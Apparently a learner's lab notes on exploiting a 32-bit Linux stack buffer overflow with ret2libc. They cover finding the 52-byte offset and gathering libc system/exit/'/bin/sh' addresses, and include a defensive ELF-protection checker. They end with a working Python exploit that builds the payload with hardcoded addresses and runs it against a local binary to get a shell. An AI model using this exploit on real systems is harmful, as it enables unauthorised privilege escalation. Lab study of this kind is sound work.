Buffer overflow - Linux

  • let's copy the binary to our machine so we can work on it more comfortably :)

  • install gef for gdb

    • to see the protections of the binary, run checksec in gdb
    • we have NX enabled, meaning we cannot execute code on the stack
    • pattern create gives you a cyclic pattern
    • run "<pattern here>"
    • pattern offset $eip shows we have 52 bytes of filler before the saved return address is overwritten
  • since NX is active (stack execution protection) we need to use ret2libc

    • we need the addresses of system, exit and the "/bin/sh" string
    • on the victim machine we can first get the base address of libc:
      • ldd <binary> 0xb7e1900
    • get the offsets of system and exit:
      • readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
      • we get the value of system@@GLIBC_2.0: 0003ada0
      • exit: 0002e9d0
      • to get the offset of a "/bin/sh" occurrence:
        • strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep bin/sh 15ba0b
    • to get the full address of the
    • ret2libc = addr_of_system + addr_of_exit + addr_of_bin_sh (each one is base + offset, packed as a 4-byte little-endian address after the filler)
  • is ASLR active? cat /proc/sys/kernel/randomize_va_space (0 means no, 2 means yes); a hardcoded libc base only works when it is 0
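The checksec and randomize_va_space checks above can be reproduced without gef. The script below is an added example, not part of the original notes: it parses the ELF program headers the same way the loader does to report NX (PT_GNU_STACK without PF_X), PIE (ET_DYN) and RELRO (PT_GNU_RELRO, upgraded to "full" when the dynamic section carries BIND_NOW), and reads randomize_va_space. Function names are my own; the constants are the standard ones from elf.h. It includes a builder for constructed, headers-only ELF images so the logic can be exercised offline, and leaves out canary detection, which would need the symbol table.

```python
import struct
import sys

# Added example (not from the original notes). Constants are the standard
# elf.h values; function names are my own.
PT_DYNAMIC = 2
PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X = 0x1
ET_DYN = 3
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1


def elf_protections(data: bytes) -> dict:
    """Return {"bits", "nx", "pie", "relro"} for an ELF image held in memory."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64 = data[4] == 2                     # EI_CLASS: 1 = ELF32, 2 = ELF64
    end = "<" if data[5] == 1 else ">"      # EI_DATA: 1 = little-endian
    e_type = struct.unpack_from(end + "H", data, 16)[0]
    if is64:
        e_phoff = struct.unpack_from(end + "Q", data, 32)[0]
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 54)
    else:
        e_phoff = struct.unpack_from(end + "I", data, 28)[0]
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 42)

    stack_flags, relro, dynamic = None, "none", None
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if is64:   # Elf64_Phdr: type, flags, offset, vaddr, paddr, filesz, ...
            p_type, p_flags, p_off, _, _, p_sz = struct.unpack_from(end + "IIQQQQ", data, off)
        else:      # Elf32_Phdr: type, offset, vaddr, paddr, filesz, memsz, flags, ...
            p_type, p_off, _, _, p_sz, _, p_flags = struct.unpack_from(end + "7I", data, off)
        if p_type == PT_GNU_STACK:
            stack_flags = p_flags
        elif p_type == PT_GNU_RELRO:
            relro = "partial"
        elif p_type == PT_DYNAMIC:
            dynamic = (p_off, p_sz)

    # A missing PT_GNU_STACK makes the kernel fall back to an executable stack.
    nx = stack_flags is not None and not (stack_flags & PF_X)
    if relro == "partial" and dynamic and _bind_now(data, dynamic, is64, end):
        relro = "full"   # the GOT is read-only after startup only with BIND_NOW
    return {"bits": 64 if is64 else 32, "nx": nx, "pie": e_type == ET_DYN, "relro": relro}


def _bind_now(data, dynamic, is64, end):
    """Scan the PT_DYNAMIC entries for any of the three BIND_NOW spellings."""
    off, size = dynamic
    fmt, step = (end + "qQ", 16) if is64 else (end + "iI", 8)
    for pos in range(off, off + size, step):
        tag, val = struct.unpack_from(fmt, data, pos)
        if tag == DT_NULL:
            break
        if tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW) \
                or (tag == DT_FLAGS_1 and val & DF_1_NOW):
            return True
    return False


def aslr_status(path="/proc/sys/kernel/randomize_va_space"):
    """0 = off, 1 = stack/mmap only, 2 = full; None if the file is unreadable."""
    try:
        with open(path) as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return None


def build_test_elf(bits, e_type, stack_flags, relro=False, bind_now=False):
    """Constructed minimal ELF (headers only, no code) so the checks run offline."""
    ehsz, phsz = (64, 56) if bits == 64 else (52, 32)
    entries = [(PT_GNU_STACK, stack_flags)] + ([(PT_GNU_RELRO, 4)] if relro else [])
    dyn = b""
    if bind_now:   # dynamic section placed right after the program headers
        dfmt = "<qQ" if bits == 64 else "<iI"
        dyn = struct.pack(dfmt, DT_FLAGS, DF_BIND_NOW) + struct.pack(dfmt, DT_NULL, 0)
        entries.append((PT_DYNAMIC, 6))
    dyn_off = ehsz + len(entries) * phsz
    phdrs = b""
    for p_type, p_flags in entries:
        p_off, p_sz = (dyn_off, len(dyn)) if p_type == PT_DYNAMIC else (0, 0)
        if bits == 64:
            phdrs += struct.pack("<IIQQQQQQ", p_type, p_flags, p_off, 0, 0, p_sz, p_sz, 0)
        else:
            phdrs += struct.pack("<IIIIIIII", p_type, p_off, 0, 0, p_sz, p_sz, p_flags, 0)
    ident = b"\x7fELF" + bytes([2 if bits == 64 else 1, 1, 1, 0]) + bytes(8)
    if bits == 64:   # e_machine 62 = x86-64
        ehdr = ident + struct.pack("<HHIQQQIHHHHHH", e_type, 62, 1, 0, ehsz, 0, 0,
                                   ehsz, phsz, len(entries), 0, 0, 0)
    else:            # e_machine 3 = i386
        ehdr = ident + struct.pack("<HHIIIIIHHHHHH", e_type, 3, 1, 0, ehsz, 0, 0,
                                   ehsz, phsz, len(entries), 0, 0, 0)
    return ehdr + phdrs + dyn


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            print(sys.argv[1], elf_protections(f.read()))
    else:
        print("sample 32-bit, NX on :", elf_protections(build_test_elf(32, 2, 6, relro=True)))
        print("sample 64-bit, NX off:", elf_protections(build_test_elf(64, 3, 7)))
    print("randomize_va_space =", aslr_status())
```

Run it with a path to report on a real binary, or with no arguments to see the two constructed samples. A binary reporting `nx: True` is the situation the notes describe (no stack execution, hence ret2libc), and `pie: True` or a randomize_va_space of 2 would make the hardcoded addresses in the script below useless, which is the defender's reason for keeping both on.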

buffer overflow script, as s4vitar does it

from struct import pack
from subprocess import call

# 52 bytes of filler reach the saved return address (found with pattern offset $eip);
# bytes, not str, so it concatenates with pack() output under Python 3
RELLENO = b"A" * 52

# libc base from ldd on the target (valid only with ASLR off), offsets from readelf / strings
base = 0xb7e19000
system_off = 0x0003ada0
exit_off = 0x0002e9d0
sh_off = 0x15ba0b

system = base + system_off
_exit = base + exit_off
sh = base + sh_off

# ret2libc chain: return into system(), with exit() as its return address
# and the "/bin/sh" string as its first argument, all little-endian 32-bit
payload = RELLENO + pack("<I", system) + pack("<I", _exit) + pack("<I", sh)

call(["/home/ayush/.binary/rop", payload])
print(payload)